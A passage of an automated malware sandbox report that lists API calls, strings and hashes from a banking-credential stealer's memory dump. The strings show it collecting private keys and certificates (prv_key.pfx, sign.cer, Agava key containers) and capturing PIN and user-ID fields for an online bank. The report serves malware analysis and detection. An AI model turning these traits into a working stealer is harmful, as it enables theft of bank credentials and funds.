                                                                                                                                                                                                              • malloc.MSVCRT(?), ref: 012F8697
                                                                                                                                                                                                              • malloc.MSVCRT(?), ref: 012F86A0
                                                                                                                                                                                                              • malloc.MSVCRT(?), ref: 012F86AC
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: malloc$free$fclosefopenfreadsprintf$callocfseekrealloc
                                                                                                                                                                                                              • String ID: %s.DBF$%s.dbf$r+b$rb+
                                                                                                                                                                                                              • API String ID: 3942648141-1626032180
                                                                                                                                                                                                              • Opcode ID: ba5c5e775ba8123f51b772fd5700fd29ae7e8c9ba5eeb99e540a806ec55fea30
                                                                                                                                                                                                              • Instruction ID: 3291ed10e2b68cd623ae5bf72634718f100fccc916d18644b897703476905ead
                                                                                                                                                                                                              • Opcode Fuzzy Hash: ba5c5e775ba8123f51b772fd5700fd29ae7e8c9ba5eeb99e540a806ec55fea30
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1FD103B1A142525FDB228F3C8C946B6FFE6EF46214F09426CEB95CB352E732D5098B50
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 01304BF0: memset.MSVCRT(?,00000000,00000124,?,775B7390,?), ref: 01304C14
                                                                                                                                                                                                                • Part of subcall function 01304BF0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,775B7390,?), ref: 01304C1F
                                                                                                                                                                                                              • OpenProcess.KERNEL32(00000410,00000000,00000000,Agava_Client.exe), ref: 01303596
                                                                                                                                                                                                              • GetModuleFileNameExA.PSAPI(00000000,00000000,?,00000104), ref: 013035B5
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,?), ref: 013035C7
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 013035D8
                                                                                                                                                                                                              • GetPrivateProfileStringA.KERNEL32(Containers,UseToken,00000000,?,00000104,?), ref: 01303620
                                                                                                                                                                                                              • strstr.MSVCRT(?,0132A8F4), ref: 01303634
                                                                                                                                                                                                              • GetPrivateProfileStringA.KERNEL32(Containers,KeysDiskPath,00000000,?,00000104,?), ref: 01303674
                                                                                                                                                                                                              • strstr.MSVCRT(?,0132A908), ref: 01303682
                                                                                                                                                                                                              • strstr.MSVCRT(?,Agava_Client.ini), ref: 01303697
                                                                                                                                                                                                              • SetCurrentDirectoryA.KERNEL32(?), ref: 01303734
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(0133CF94), ref: 0130376D
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: strstr$HandlePrivateProfileString$BackslashCloseCreateCurrentDirectoryFileInformationModuleNameOpenPathProcessSnapshotToolhelp32memset
                                                                                                                                                                                                              • String ID: .ini$Agava_Client.exe$Agava_Client.ini$Agava_keys$Containers$KeysDiskPath$Local\{EAF777FF-8989-4fe1-977D-95CD777C0214}$P0Mw$UseToken$keys.zip$keys_path.txt
                                                                                                                                                                                                              • API String ID: 2651364649-2496749083
                                                                                                                                                                                                              • Opcode ID: e1ac55156c8c04cc640493a5c0cfdfa5a035203e6b9f24b312b9d7624e5f0c37
                                                                                                                                                                                                              • Instruction ID: b03ee8880735f5637a1aad0f1ef9ab2ec109adfc91e5384ced5290be16f77462
                                                                                                                                                                                                              • Opcode Fuzzy Hash: e1ac55156c8c04cc640493a5c0cfdfa5a035203e6b9f24b312b9d7624e5f0c37
                                                                                                                                                                                                              • Instruction Fuzzy Hash: BFA10930A0431E5FCB37DF289C69BEA7FE9BF45708F144198E945D7281EA719A48CB90
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memset.MSVCRT(?,00000000,00000104), ref: 012FC261
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(61C5C0CB), ref: 012FC287
                                                                                                                                                                                                              • CreateDirectoryA.KERNEL32(?,00000000), ref: 012FC2E8
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 012FC2F2
                                                                                                                                                                                                              • #680.SHELL32 ref: 012FC2FA
                                                                                                                                                                                                              • PathMakeSystemFolderA.SHLWAPI(?), ref: 012FC30B
                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000), ref: 012FC312
                                                                                                                                                                                                              • memset.MSVCRT(?,00000000,00000104), ref: 012FC326
                                                                                                                                                                                                              • SHFileOperationA.SHELL32(?), ref: 012FC3BD
                                                                                                                                                                                                              • memset.MSVCRT(?,00000000,00000104), ref: 012FC3D4
                                                                                                                                                                                                              • SHFileOperationA.SHELL32(?), ref: 012FC452
                                                                                                                                                                                                              • memset.MSVCRT(?,00000000,00000104), ref: 012FC469
                                                                                                                                                                                                              • SHFileOperationA.SHELL32(?), ref: 012FC4E6
                                                                                                                                                                                                              • memset.MSVCRT(?,00000000,00000104), ref: 012FC4FD
                                                                                                                                                                                                              • SHFileOperationA.SHELL32(?), ref: 012FC578
                                                                                                                                                                                                              • memset.MSVCRT(?,00000000,00000104), ref: 012FC58F
                                                                                                                                                                                                              • SHFileOperationA.SHELL32(?), ref: 012FC607
                                                                                                                                                                                                              • memset.MSVCRT(?,00000000,00000104), ref: 012FC61E
                                                                                                                                                                                                              • SHFileOperationA.SHELL32(?), ref: 012FC6AB
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              • API ID: memset$FileOperation$ErrorLastPath$#680BackslashCreateDirectoryFolderMakeSystem
                                                                                                                                                                                                              • String ID: 61C5C0CB$\*.key$\@rand$\ABONENTS*$\CA*$\CRL*$\self.cer$keys
                                                                                                                                                                                                              • API String ID: 429570753-1642428849
                                                                                                                                                                                                              • Opcode ID: 1e9ddafcbf65d4f7857f6202ee491bdca8b5783d911239ac12f3be5abd922b67
                                                                                                                                                                                                              • Instruction ID: 528280663512ca5fbf252efa258fddace4413f1e3c5d6f06b72de2bc630a84b9
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1e9ddafcbf65d4f7857f6202ee491bdca8b5783d911239ac12f3be5abd922b67
                                                                                                                                                                                                              • Instruction Fuzzy Hash: D0E139B0C0425E9FCB62DFA8D854AEEBBF4EF49304F1085A9D649E7211E7349658CF90
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: P0Mw$open$taskmgr
                                                                                                                                                                                                              • API String ID: 0-2678412989
                                                                                                                                                                                                              • Opcode ID: 5da66f859d3cbac076e18927a0722cbf508779ecbff98de57573a15651c54710
                                                                                                                                                                                                              • Instruction ID: a9fecf05e47e7eebe8d88f0a63b8e6e668f9d9aef43d2a67bfa6f2c4e7b6c89a
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5da66f859d3cbac076e18927a0722cbf508779ecbff98de57573a15651c54710
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1B91B775610205EBD730EF68EC8CEEABBACEB59326F50415DFB05A7285C7719901CBA0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memset.MSVCRT(?,00000000,00000103), ref: 013020EE
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(61c5c487), ref: 0130212F
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(61c5c487), ref: 0130216B
                                                                                                                                                                                                              • CreateDirectoryA.KERNEL32(?,00000000), ref: 01302180
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 0130218A
                                                                                                                                                                                                              • #680.SHELL32 ref: 01302192
                                                                                                                                                                                                              • PathMakeSystemFolderA.SHLWAPI(?), ref: 013021A3
                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000), ref: 013021AA
                                                                                                                                                                                                              • SetFileAttributesA.KERNEL32(?,00000000), ref: 013021E2
                                                                                                                                                                                                              • DeleteFileA.KERNEL32(?), ref: 013021EF
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(61c5c487,?,?), ref: 01302237
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              • API ID: Path$Backslash$ErrorFileLast$#680AttributesCreateDeleteDirectoryFolderMakeSystemmemset
                                                                                                                                                                                                              • String ID: 61c5c487$keys.zip$path.txt
                                                                                                                                                                                                              • API String ID: 523324327-3869562356
                                                                                                                                                                                                              • Opcode ID: 79485fc2dd5a6b08bdfafe87945bd23211501b7c27ad25b1090167a984dc7ba5
                                                                                                                                                                                                              • Instruction ID: d98dac633a72ad326de46d954ef5a2a53ad0edaa4c3fe0f7b04d24075bddf88d
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 79485fc2dd5a6b08bdfafe87945bd23211501b7c27ad25b1090167a984dc7ba5
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6871F2305003559BDB32AF789C6CBEB7BECBB49309F148198FA85D7285DA709648CB90
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memset.MSVCRT(?,00000000,00000103), ref: 013001BE
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(61C5C165), ref: 013001EB
                                                                                                                                                                                                              • CreateDirectoryA.KERNEL32(?,00000000), ref: 0130022D
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 01300233
                                                                                                                                                                                                              • #680.SHELL32 ref: 0130023B
                                                                                                                                                                                                              • PathMakeSystemFolderA.SHLWAPI(?), ref: 0130024C
                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000), ref: 01300253
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(61C5C165,?,?), ref: 013002C7
                                                                                                                                                                                                              • CreateDirectoryA.KERNEL32(00000000,00000000), ref: 01300305
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              • API ID: Path$BackslashCreateDirectoryErrorLast$#680FolderMakeSystemmemset
                                                                                                                                                                                                              • String ID: 61C5C165$Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC0214}$P0Mw$path.txt
                                                                                                                                                                                                              • API String ID: 3538034526-3859182591
                                                                                                                                                                                                              • Opcode ID: 7b0dc1ef27be99c2f75145910c2c9575a390a80cfe6c14f6c4a3afed01a3c5fc
                                                                                                                                                                                                              • Instruction ID: 83a9872614222e5596e9da8e5bb64d3db8eb3399757f8827623342a744490832
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7b0dc1ef27be99c2f75145910c2c9575a390a80cfe6c14f6c4a3afed01a3c5fc
                                                                                                                                                                                                              • Instruction Fuzzy Hash: F271F8315003159FDB379F789868BEB7BE8EF46389F148198F985DB281DB709A44CB90
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • strstr.MSVCRT(00000000,&txtSubId=,00000000,?), ref: 01301A83
                                                                                                                                                                                                              • strstr.MSVCRT(00000000,&txtPin=), ref: 01301A92
                                                                                                                                                                                                              • strstr.MSVCRT(00000000,ebank.laiki.com), ref: 01301AA1
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(0133D4A8), ref: 01301ACD
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(0133D4A8), ref: 01301B03
                                                                                                                                                                                                              • CreateDirectoryA.KERNEL32(?,00000000,?), ref: 01301B6C
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 01301B76
                                                                                                                                                                                                              • #680.SHELL32 ref: 01301B7E
                                                                                                                                                                                                              • PathMakeSystemFolderA.SHLWAPI(?), ref: 01301B8F
                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000), ref: 01301B96
                                                                                                                                                                                                              • SetCurrentDirectoryA.KERNEL32(?), ref: 01301BA3
                                                                                                                                                                                                              • CreateMutexA.KERNEL32(00000000,00000000,Local\{EAF339BF-89ea-4fe1-9A0D-95CD39DC0214},00000000,00000001), ref: 01301BCD
                                                                                                                                                                                                              • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;;NRNWNX;;;LW),00000001,00000000,00000000), ref: 01301BF2
                                                                                                                                                                                                              • GetSecurityDescriptorSacl.ADVAPI32(00000000,00000000,00000000,012F8A50), ref: 01301C0F
                                                                                                                                                                                                              • SetNamedSecurityInfoA.ADVAPI32(Local\{EAF339BF-89ea-4fe1-9A0D-95CD39DC0214},00000006,00000010,00000000,00000000,00000000,00000000), ref: 01301C29
                                                                                                                                                                                                              • LocalFree.KERNEL32(00000000), ref: 01301C33
                                                                                                                                                                                                              • Sleep.KERNEL32(000003E8), ref: 01301C3E
                                                                                                                                                                                                              • ReleaseMutex.KERNEL32(00000000), ref: 01301C45
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,00000000), ref: 01301C53
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 01301C64
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Security$DescriptorPathstrstr$BackslashCreateDirectoryErrorHandleLastMutex$#680CloseConvertCurrentFolderFreeInfoInformationLocalMakeNamedReleaseSaclSleepStringSystem
                                                                                                                                                                                                              • String ID: &txtPin=$&txtSubId=$Local\{EAF339BF-89ea-4fe1-9A0D-95CD39DC0214}$P0Mw$S:(ML;;NRNWNX;;;LW)$ebank.laiki.com$pass.txt
                                                                                                                                                                                                              • API String ID: 4186562213-859513243
                                                                                                                                                                                                              • Opcode ID: e349a9f0380b04a639d304c964316b2738c0faa0f1d582a530a3dc0c5e9ad8cb
                                                                                                                                                                                                              • Instruction ID: 050ec304a9402a957f2135cd4a01d4d66094bcc79b6a951789de10bda3e62b7d
                                                                                                                                                                                                              • Opcode Fuzzy Hash: e349a9f0380b04a639d304c964316b2738c0faa0f1d582a530a3dc0c5e9ad8cb
                                                                                                                                                                                                              • Instruction Fuzzy Hash: F551D7316002096BDB32AF789CA9AEF7BEDEF45749F04815CF946D7241EB70DA4487A0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,prv_key.pfx), ref: 012FF05D
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(61C5C1E7), ref: 012FF09E
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(61C5C1E7), ref: 012FF0D2
                                                                                                                                                                                                              • CreateDirectoryA.KERNEL32(?,00000000), ref: 012FF0E7
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 012FF0F1
                                                                                                                                                                                                              • #680.SHELL32 ref: 012FF0F9
                                                                                                                                                                                                              • PathMakeSystemFolderA.SHLWAPI(?), ref: 012FF10A
                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000), ref: 012FF111
                                                                                                                                                                                                              • SetFileAttributesA.KERNEL32(?,00000000), ref: 012FF14B
                                                                                                                                                                                                              • DeleteFileA.KERNEL32(?), ref: 012FF158
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(61C5C1E7,0132FDB8,0132FDB9), ref: 012FF199
                                                                                                                                                                                                              • CreateDirectoryA.KERNEL32(?,00000000), ref: 012FF1D4
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 012FF1DE
                                                                                                                                                                                                              • #680.SHELL32 ref: 012FF1E6
                                                                                                                                                                                                              • PathMakeSystemFolderA.SHLWAPI(?), ref: 012FF1F7
                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000), ref: 012FF1FE
                                                                                                                                                                                                              • SetFileAttributesA.KERNEL32(?,00000000), ref: 012FF23B
                                                                                                                                                                                                              • DeleteFileA.KERNEL32(?), ref: 012FF248
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,012FF420,0132FDB8,00000000,00000000,?,?), ref: 012FF27E
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,?), ref: 012FF296
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 012FF2A7
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Path$ErrorFileLast$BackslashCreate$#680AttributesDeleteDirectoryFolderHandleMakeSystem$CloseInformationThread
                                                                                                                                                                                                              • String ID: 61C5C1E7$pass.log$path.txt$prv_key.pfx
                                                                                                                                                                                                              • API String ID: 2297442659-461251971
                                                                                                                                                                                                              • Opcode ID: b6d66b51401410ff96b216cc94017d35ed10e98a8ebd77650c9affe453f4a23a
                                                                                                                                                                                                              • Instruction ID: 4a875407de721d27e26dce4d6bb0fddea6c9c6509dcc2fad1a0c402558b960fa
                                                                                                                                                                                                              • Opcode Fuzzy Hash: b6d66b51401410ff96b216cc94017d35ed10e98a8ebd77650c9affe453f4a23a
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4371F5366002165BDB31AF28D958BEABBE8AF46301F14819CFB85D7244DA70DA49CB90
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(61C5C1E7), ref: 012FF449
                                                                                                                                                                                                              • CreateDirectoryA.KERNEL32(0133D890,00000000), ref: 012FF488
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 012FF494
                                                                                                                                                                                                              • #680.SHELL32 ref: 012FF498
                                                                                                                                                                                                              • PathMakeSystemFolderA.SHLWAPI(0133D890), ref: 012FF4A7
                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000), ref: 012FF4AE
                                                                                                                                                                                                              • CreateDirectoryA.KERNEL32(0133D890,00000000), ref: 012FF4E2
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 012FF4E8
                                                                                                                                                                                                              • #680.SHELL32 ref: 012FF4EC
                                                                                                                                                                                                              • PathMakeSystemFolderA.SHLWAPI(0133D890), ref: 012FF4FB
                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000), ref: 012FF502
                                                                                                                                                                                                              • GetFileAttributesA.KERNEL32(?), ref: 012FF50C
                                                                                                                                                                                                              • CopyFileA.KERNEL32(0133DCB0,0133DBA8,00000000), ref: 012FF5B9
                                                                                                                                                                                                              • CopyFileA.KERNEL32(0133DCB0,0133DBA8,00000000), ref: 012FF633
                                                                                                                                                                                                              • CreateMutexA.KERNEL32(00000000,00000000,Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14}), ref: 012FF63E
                                                                                                                                                                                                              • Sleep.KERNEL32(000003E8,Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14},00000006), ref: 012FF65B
                                                                                                                                                                                                              • ReleaseMutex.KERNEL32(00000000), ref: 012FF662
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,?), ref: 012FF674
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 012FF685
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ErrorLast$CreateFilePath$#680CopyDirectoryFolderHandleMakeMutexSystem$AttributesBackslashCloseInformationReleaseSleep
                                                                                                                                                                                                              • String ID: 61C5C1E7$Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14}$P0Mw$keys\$prv_key.pfx$sign.cer
                                                                                                                                                                                                              • API String ID: 3009083915-1123098298
                                                                                                                                                                                                              • Opcode ID: 4a145da173fe79ce482a89cb73f436bf6bb99602db93752b9b76348dc002de9f
                                                                                                                                                                                                              • Instruction ID: d3e17761dff9d8d581964c7de6b91be86482c55262a9ec9ae9df8967f8be1469
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4a145da173fe79ce482a89cb73f436bf6bb99602db93752b9b76348dc002de9f
                                                                                                                                                                                                              • Instruction Fuzzy Hash: CE6125325143429FD7325F3CA928BA6BFD4AF4A704F5980ACEB89CB352DA70D405CB94
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(61C5C1E7), ref: 012FF449
                                                                                                                                                                                                              • CreateDirectoryA.KERNEL32(0133D890,00000000), ref: 012FF488
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 012FF494
                                                                                                                                                                                                              • #680.SHELL32 ref: 012FF498
                                                                                                                                                                                                              • PathMakeSystemFolderA.SHLWAPI(0133D890), ref: 012FF4A7
                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000), ref: 012FF4AE
                                                                                                                                                                                                              • CreateDirectoryA.KERNEL32(0133D890,00000000), ref: 012FF4E2
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 012FF4E8
                                                                                                                                                                                                              • #680.SHELL32 ref: 012FF4EC
                                                                                                                                                                                                              • PathMakeSystemFolderA.SHLWAPI(0133D890), ref: 012FF4FB
                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000), ref: 012FF502
                                                                                                                                                                                                              • GetFileAttributesA.KERNEL32(?), ref: 012FF50C
                                                                                                                                                                                                              • CopyFileA.KERNEL32(0133DCB0,0133DBA8,00000000), ref: 012FF5B9
                                                                                                                                                                                                              • CopyFileA.KERNEL32(0133DCB0,0133DBA8,00000000), ref: 012FF633
                                                                                                                                                                                                              • CreateMutexA.KERNEL32(00000000,00000000,Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14}), ref: 012FF63E
                                                                                                                                                                                                              • Sleep.KERNEL32(000003E8,Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14},00000006), ref: 012FF65B
                                                                                                                                                                                                              • ReleaseMutex.KERNEL32(00000000), ref: 012FF662
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,?), ref: 012FF674
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 012FF685
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ErrorLast$CreateFilePath$#680CopyDirectoryFolderHandleMakeMutexSystem$AttributesBackslashCloseInformationReleaseSleep
                                                                                                                                                                                                              • String ID: 61C5C1E7$Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14}$P0Mw$keys\$prv_key.pfx$sign.cer
                                                                                                                                                                                                              • API String ID: 3009083915-1123098298
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetFileAttributesA.KERNEL32(?), ref: 012FD278
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,found.), ref: 012FD293
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,asus), ref: 012FD2AE
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(61C5C0CB), ref: 012FD2D4
                                                                                                                                                                                                              • CreateDirectoryA.KERNEL32(?,00000000), ref: 012FD30E
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 012FD318
                                                                                                                                                                                                              • #680.SHELL32 ref: 012FD320
                                                                                                                                                                                                              • PathMakeSystemFolderA.SHLWAPI(?), ref: 012FD32F
                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000), ref: 012FD336
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(61C5C0CB,?,?), ref: 012FD3D9
                                                                                                                                                                                                              • CreateDirectoryA.KERNEL32(?,00000000), ref: 012FD413
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 012FD41D
                                                                                                                                                                                                              • #680.SHELL32 ref: 012FD425
                                                                                                                                                                                                              • PathMakeSystemFolderA.SHLWAPI(?), ref: 012FD434
                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000), ref: 012FD43B
                                                                                                                                                                                                              • FindNextFileA.KERNEL32(?,?), ref: 012FD52F
                                                                                                                                                                                                              • SetErrorMode.KERNEL32(?), ref: 012FD563
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmp
